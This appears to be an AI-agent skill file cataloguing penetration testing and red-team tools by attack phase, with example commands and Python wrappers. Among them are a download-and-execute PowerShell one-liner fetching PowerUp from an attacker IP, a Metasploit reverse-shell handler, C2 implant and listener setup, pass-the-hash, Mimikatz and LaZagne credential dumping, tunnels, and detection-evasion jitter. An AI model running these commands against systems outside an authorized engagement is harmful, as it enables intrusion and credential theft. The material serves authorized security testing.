Curated penetration testing and red team tools collection organized by penetration testing lifecycle and MITRE ATT&CK framework
---
name: awesome-pentest-tools-catalog
description: Curated penetration testing and red team tools collection organized by penetration testing lifecycle and MITRE ATT&CK framework
triggers:
- what penetration testing tools are available for reconnaissance
- show me tools for privilege escalation on windows
- which tools can help with web vulnerability scanning
- find tools for domain enumeration and lateral movement
- what are the best C2 frameworks for red teaming
- help me find tools for fingerprinting web applications
- recommend tools for tunneling and proxy during pentest
- show me free alternatives to commercial security scanners
---
# Awesome Pentest Tools Catalog
> Skill by [ara.so](https://ara.so) — Security Skills collection.
This skill provides expert knowledge of the **Awesome Pentest Tools** catalog, a comprehensive collection of penetration testing and red team tools organized by the penetration testing lifecycle and MITRE ATT&CK framework. Use this to discover, recommend, and implement security testing tools across all phases of penetration testing.
## Overview
The catalog organizes tools into these primary phases:
1. **Information Gathering** (信息收集) - Asset and target reconnaissance
2. **Vulnerability Analysis** (漏洞分析) - Host and web vulnerability scanning
3. **Exploitation** (漏洞利用) - Exploit frameworks and service-specific tools
4. **Privilege Escalation** (权限提升) - Linux, Windows, and container escape
5. **Persistence** (权限维持与后门) - C2 frameworks, webshells, and evasion
6. **Tunneling & Proxying** (隧道代理) - Network pivoting and protocol tunneling
7. **Post-Exploitation** (后渗透与域) - Credential theft and lateral movement
8. **Covering Tracks** (痕迹清理) - Log cleanup and anti-forensics
## Key Tool Categories
### Information Gathering
#### Network & Port Scanning
```bash
# Masscan - Fast internet-wide TCP scanner
masscan -p1-65535 192.168.1.0/24 --rate=10000 -oL output.txt
# RustScan - Modern port scanner
rustscan -a 192.168.1.1 --ulimit 5000 -- -A -sC
# Naabu - Fast port discovery
naabu -host 192.168.1.1 -p - -rate 10000
# Nmap - Network mapper
nmap -sV -sC -p- 192.168.1.1 -oA scan_results
# Netspy - Internal network segment discovery
netspy -t 192.168.1.1
```
#### Fingerprinting & Technology Detection
```bash
# WhatWeb - Next generation web scanner
whatweb -v -a 3 https://target.com
# Webanalyze - Batch Wappalyzer detection
webanalyze -host https://target.com -apps apps.json
# EHole - Red team system fingerprint detection
./EHole finger -l urls.txt -json result.json
# TideFinger - Comprehensive fingerprint recognition
./TideFinger_Go -u https://target.com
```
#### Directory & Parameter Discovery
```bash
# FFuF - Fast web fuzzer
ffuf -w wordlist.txt -u https://target.com/FUZZ -mc 200,301,302
# Dirsearch - Web path scanner
dirsearch -u https://target.com -e php,html,js -x 403,404
# Feroxbuster - Fast content discovery
feroxbuster -u https://target.com -w wordlist.txt -x php,asp,aspx,jsp
```
### Vulnerability Scanning
#### Quick Network Scanning
```bash
# Fscan - Comprehensive internal network scanner
./fscan -h 192.168.1.0/24 -np -no -nobr
# Vscan - Vulnerability scanner with POC integration
./vscan -target 192.168.1.1 -all
```
#### Comprehensive Vulnerability Assessment
```bash
# Nuclei - Fast template-based scanner
nuclei -l targets.txt -t nuclei-templates/ -severity critical,high
# Xray - Passive & active security scanner
xray webscan --basic-crawler http://target.com --html-output report.html
# OpenVAS - Full-featured vulnerability scanner
# (GUI-based, typically accessed via web interface)
```
#### Code Auditing
```python
# Semgrep - Static analysis for many languages
# Install: pip install semgrep
import subprocess
def scan_code(path, rules="auto"):
"""Run semgrep security scan"""
cmd = ["semgrep", "--config", rules, path, "--json"]
result = subprocess.run(cmd, capture_output=True, text=True)
return result.stdout
# Usage
scan_results = scan_code("./src", "p/security-audit")
```
```bash
# Fortify - Java code auditor
java -jar fortify.jar -source ./src -output report.html
# Seay - PHP code auditor (GUI-based)
# Typically run through graphical interface
```
### Exploitation
#### Framework Tools
```python
# SearchSploit - Exploit-DB search
import subprocess
def search_exploits(keyword):
"""Search for exploits using searchsploit"""
result = subprocess.run(
["searchsploit", keyword, "-j"],
capture_output=True,
text=True
)
return result.stdout
# Usage
exploits = search_exploits("apache 2.4")
```
```bash
# Metasploit Framework
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 10.0.0.1; set LPORT 4444; exploit"
# Pocsuite3 - POC framework
pocsuite -r poc_file.py -u http://target.com --verify
```
#### Service-Specific Tools
```bash
# Hydra - Network login cracker
hydra -L users.txt -P passwords.txt ssh://192.168.1.1
# SQLMap - SQL injection tool
sqlmap -u "http://target.com/page?id=1" --dbs --batch
# Redis exploitation
redis-cli -h 192.168.1.1 -a $REDIS_PASSWORD
```
### Privilege Escalation
#### Linux Privilege Escalation
```bash
# LinPEAS - Linux privilege escalation scanner
./linpeas.sh -a > linpeas_report.txt
# Linux Exploit Suggester
./linux-exploit-suggester.sh --uname $(uname -r)
# PEASS-ng (includes linpeas, winpeas)
./linpeas.sh -q -o linpeas_out.txt
```
#### Windows Privilege Escalation
```powershell
# WinPEAS - Windows privilege escalation scanner
.\winPEASx64.exe > winpeas_output.txt
# Windows Exploit Suggester - NG
python wes.py systeminfo.txt -i 'Elevation of Privilege' --hide 'Internet Explorer'
# PowerUp - PowerShell privilege escalation
powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.1/PowerUp.ps1'); Invoke-AllChecks"
```
### Post-Exploitation & C2
#### Command & Control Frameworks
```python
# Sliver - Modern C2 framework
# Generate implant
# sliver > generate --http 10.0.0.1 --save /tmp/payload.exe
# Cobalt Strike (commercial) - Beacon configuration
# Typically configured via GUI teamserver
# Empire/Starkiller - PowerShell C2
# Configure via web interface or API
import requests
import os
def empire_create_listener(api_url, token):
"""Create Empire HTTP listener"""
headers = {"Authorization": f"Bearer {token}"}
listener_config = {
"name": "http_listener",
"template": "http",
"options": {
"Host": "http://10.0.0.1:8080",
"Port": "8080"
}
}
response = requests.post(
f"{api_url}/listeners",
json=listener_config,
headers=headers
)
return response.json()
# Usage with environment variable
empire_url = os.getenv("EMPIRE_API_URL", "http://localhost:1337/api/v2")
empire_token = os.getenv("EMPIRE_API_TOKEN")
```
#### WebShell Management
```php
// Behinder (冰蝎) - Encrypted webshell
// Client connects to server-side shell with password
// Godzilla (哥斯拉) - Advanced webshell manager
// Supports multiple payload types: JSP, PHP, ASP, ASPX
// AntSword (蚁剑) - Cross-platform webshell manager
// Configuration example (do not hardcode credentials)
```
```python
# Interactive shell upgrade
"""
Common pattern for upgrading to interactive TTY shell
"""
import subprocess
upgrade_commands = """
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
# Press Ctrl+Z
stty raw -echo; fg
stty rows 38 columns 116
"""
```
### Tunneling & Proxying
#### Modern Tunneling Tools
```bash
# Chisel - Fast TCP/UDP tunnel over HTTP
# Server
./chisel server -p 8080 --reverse
# Client
./chisel client http://10.0.0.1:8080 R:socks
# NPS - Powerful penetration testing proxy
# Server
./nps install
./nps start
# Client
./npc -server=10.0.0.1:8024 -vkey=$NPS_VKEY -type=tcp
```
```go
// Frp - Fast reverse proxy configuration example
// frps.ini (server)
/*
[common]
bind_port = 7000
token = ${FRP_TOKEN}
*/
// frpc.ini (client)
/*
[common]
server_addr = 10.0.0.1
server_port = 7000
token = ${FRP_TOKEN}
[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000
*/
```
#### Protocol-Specific Tunnels
```bash
# Regeorg - SOCKS over HTTP
python reGeorgSocksProxy.py -p 1080 -u http://target.com/tunnel.jsp
# Neo-reGeorg - Improved version
python neoreg.py generate -k $TUNNEL_PASSWORD
python neoreg.py -k $TUNNEL_PASSWORD -u http://target.com/tunnel.php
# DNS Tunneling with dnscat2
# Server
dnscat2-server tunnel.example.com
# Client
./dnscat tunnel.example.com
```
### Domain & Lateral Movement
```bash
# BloodHound - Active Directory visualization
# Start Neo4j database
neo4j console
# Collect data with SharpHound
.\SharpHound.exe -c All --outputdirectory C:\Temp
# Impacket - Python classes for network protocols
# Pass-the-Hash with wmiexec
impacket-wmiexec -hashes :$NTLM_HASH administrator@192.168.1.10
# Mimikatz - Credential extraction (Windows)
privilege::debug
sekurlsa::logonpasswords
# LaZagne - Credential recovery tool
laZagne.exe all -oN output.txt
```
```python
# CrackMapExec - Network authentication testing
import subprocess
import os
def cme_smb_scan(target_range, username, password_file):
"""Execute CrackMapExec SMB scan"""
cmd = [
"crackmapexec", "smb", target_range,
"-u", username,
"-p", password_file,
"--shares"
]
result = subprocess.run(cmd, capture_output=True, text=True)
return result.stdout
# Usage
results = cme_smb_scan(
"192.168.1.0/24",
"administrator",
os.getenv("PASSWORD_LIST", "passwords.txt")
)
```
## Common Workflows
### External Pentest Workflow
```python
"""
Typical external penetration test workflow
"""
import subprocess
import os
class ExternalPentest:
def __init__(self, target_domain):
self.target = target_domain
self.results_dir = f"results_{target_domain}"
os.makedirs(self.results_dir, exist_ok=True)
def asset_discovery(self):
"""Phase 1: Asset discovery"""
# Subdomain enumeration
subprocess.run([
"subfinder", "-d", self.target,
"-o", f"{self.results_dir}/subdomains.txt"
])
# HTTP probing
subprocess.run([
"httpx", "-l", f"{self.results_dir}/subdomains.txt",
"-o", f"{self.results_dir}/live_hosts.txt"
])
def port_scanning(self):
"""Phase 2: Port scanning"""
subprocess.run([
"naabu", "-l", f"{self.results_dir}/live_hosts.txt",
"-p", "-", "-rate", "10000",
"-o", f"{self.results_dir}/ports.txt"
])
def vulnerability_scan(self):
"""Phase 3: Vulnerability scanning"""
subprocess.run([
"nuclei", "-l", f"{self.results_dir}/live_hosts.txt",
"-t", "nuclei-templates/",
"-severity", "critical,high",
"-o", f"{self.results_dir}/vulnerabilities.txt"
])
def run_full_scan(self):
"""Execute complete external pentest"""
self.asset_discovery()
self.port_scanning()
self.vulnerability_scan()
return f"Results saved in {self.results_dir}/"
# Usage
pentest = ExternalPentest("target.com")
pentest.run_full_scan()
```
### Internal Network Pentest
```bash
#!/bin/bash
# Internal network penetration testing workflow
TARGET_NETWORK="192.168.1.0/24"
RESULTS_DIR="internal_pentest_$(date +%Y%m%d)"
mkdir -p $RESULTS_DIR
# Phase 1: Network discovery
echo "[*] Phase 1: Network Discovery"
nmap -sn $TARGET_NETWORK -oA $RESULTS_DIR/network_sweep
# Phase 2: Port scanning
echo "[*] Phase 2: Port Scanning"
nmap -p- -T4 -iL $RESULTS_DIR/network_sweep.gnmap -oA $RESULTS_DIR/full_scan
# Phase 3: Service detection
echo "[*] Phase 3: Service Detection"
nmap -sV -sC -iL $RESULTS_DIR/network_sweep.gnmap -oA $RESULTS_DIR/service_scan
# Phase 4: Vulnerability scanning
echo "[*] Phase 4: Vulnerability Scanning"
fscan -hf $RESULTS_DIR/network_sweep.gnmap -o $RESULTS_DIR/fscan_results.txt
# Phase 5: Exploit vulnerable services
echo "[*] Phase 5: Exploitation (manual review required)"
echo "Review results in $RESULTS_DIR/"
```
## Configuration Examples
### Nuclei Templates Configuration
```yaml
# nuclei-config.yaml
# Place in ~/.config/nuclei/config.yaml
templates:
- /path/to/nuclei-templates
- /path/to/custom-templates
severity:
- critical
- high
threads: 50
rate-limit: 150
timeout: 5
http:
max-redirects: 3
user-agent: "Custom-Scanner/1.0"
network:
max-host-error: 30
output:
no-timestamp: false
json: true
```
### Proxychains Configuration
```ini
# /etc/proxychains.conf or ~/.proxychains/proxychains.conf
strict_chain
# or dynamic_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
# Add your SOCKS proxy
socks5 127.0.0.1 1080
# Or HTTP proxy
http 127.0.0.1 8080
```
## Best Practices
### Tool Selection Guide
```python
"""
Helper functions for tool selection based on scenario
"""
def select_port_scanner(scenario):
"""Choose appropriate port scanner"""
scanners = {
"internet_wide": "masscan", # Fastest for large ranges
"single_host_full": "rustscan", # Fast + comprehensive
"service_detection": "nmap", # Best fingerprinting
"internal_network": "naabu", # Balanced speed/accuracy
}
return scanners.get(scenario, "nmap")
def select_web_scanner(target_type):
"""Choose web vulnerability scanner"""
scanners = {
"quick_check": "nuclei", # Template-based, fast
"comprehensive": "xray", # Deep crawl + detection
"api_testing": "ffuf", # API endpoint fuzzing
"sql_injection": "sqlmap", # SQL-specific
}
return scanners.get(target_type, "nuclei")
def select_c2_framework(requirements):
"""Choose C2 framework based on requirements"""
frameworks = {
"stealth": "sliver", # Modern, encrypted
"feature_rich": "cobaltstrike", # Commercial, full-featured
"powershell": "empire", # PowerShell-focused
"open_source": "covenant", # .NET-based alternative
}
return frameworks.get(requirements, "sliver")
```
### Safety & Legality
```python
"""
Pre-engagement checklist automation
"""
import os
from datetime import datetime
class PentestEngagement:
def __init__(self):
self.scope = []
self.out_of_scope = []
self.authorization = None
self.start_date = None
self.end_date = None
def verify_authorization(self, target):
"""Verify target is in authorized scope"""
if target in self.out_of_scope:
raise ValueError(f"Target {target} is OUT OF SCOPE")
if target not in self.scope:
raise ValueError(f"Target {target} not in authorized scope")
current_date = datetime.now()
if not (self.start_date <= current_date <= self.end_date):
raise ValueError("Outside authorized testing window")
return True
def log_action(self, action, target):
"""Log all testing actions"""
log_entry = f"[{datetime.now()}] {action} on {target}\n"
with open("pentest_log.txt", "a") as f:
f.write(log_entry)
# Usage
engagement = PentestEngagement()
engagement.scope = ["192.168.1.0/24", "target.com"]
engagement.out_of_scope = ["192.168.1.1"] # Critical infrastructure
engagement.start_date = datetime(2024, 1, 1)
engagement.end_date = datetime(2024, 1, 31)
try:
engagement.verify_authorization("192.168.1.50")
engagement.log_action("nmap scan", "192.168.1.50")
except ValueError as e:
print(f"Authorization check failed: {e}")
```
## Troubleshooting
### Tool Installation Issues
```bash
# Go-based tools (nuclei, naabu, httpx, etc.)
export GO111MODULE=on
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
# Python tools with dependency issues
python3 -m venv pentest_env
source pentest_env/bin/activate
pip install --upgrade pip setuptools wheel
pip install impacket sqlmap
# Binary tools permission issues
chmod +x ./tool_name
# If capabilities needed (e.g., raw sockets)
sudo setcap cap_net_raw+ep ./tool_name
```
### Network/Proxy Issues
```bash
# Test proxy connectivity
curl --proxy socks5://127.0.0.1:1080 http://example.com
# Force tool through proxy
proxychains4 nmap -sT 192.168.1.1
# DNS issues in proxied environment
echo "nameserver 8.8.8.8" | sudo tee /etc/resolv.conf
```
### Rate Limiting & Detection
```python
"""
Implement rate limiting and jitter to avoid detection
"""
import time
import random
class StealthScanner:
def __init__(self, delay_range=(1, 5)):
self.delay_range = delay_range
def random_delay(self):
"""Add random delay between requests"""
delay = random.uniform(*self.delay_range)
time.sleep(delay)
def scan_targets(self, targets, scan_function):
"""Scan with rate limiting"""
results = []
for target in targets:
self.random_delay()
result = scan_function(target)
results.append(result)
return results
# Usage
scanner = StealthScanner(delay_range=(2, 8))
# scanner.scan_targets(target_list, scan_function)
```
## Additional Resources
- **Official Documentation**: Review individual tool repositories for detailed docs
- **Community**: Many tools have Discord/Slack channels for support
- **Updates**: Follow tool maintainers on GitHub for latest releases
- **Legal Framework**: Always obtain written authorization before testing
## Environment Variables Reference
```bash
# Common environment variables for security tools
export NUCLEI_TEMPLATES_PATH="/opt/nuclei-templates"
export METASPLOIT_DB_HOST="localhost"
export EMPIRE_API_TOKEN="your-api-token-here"
export FRP_TOKEN="your-frp-token-here"
export NPS_VKEY="your-nps-vkey-here"
export TUNNEL_PASSWORD="your-tunnel-password-here"
export PASSWORD_LIST="/path/to/passwords.txt"
```
Creator's repository · aradotso/security-skills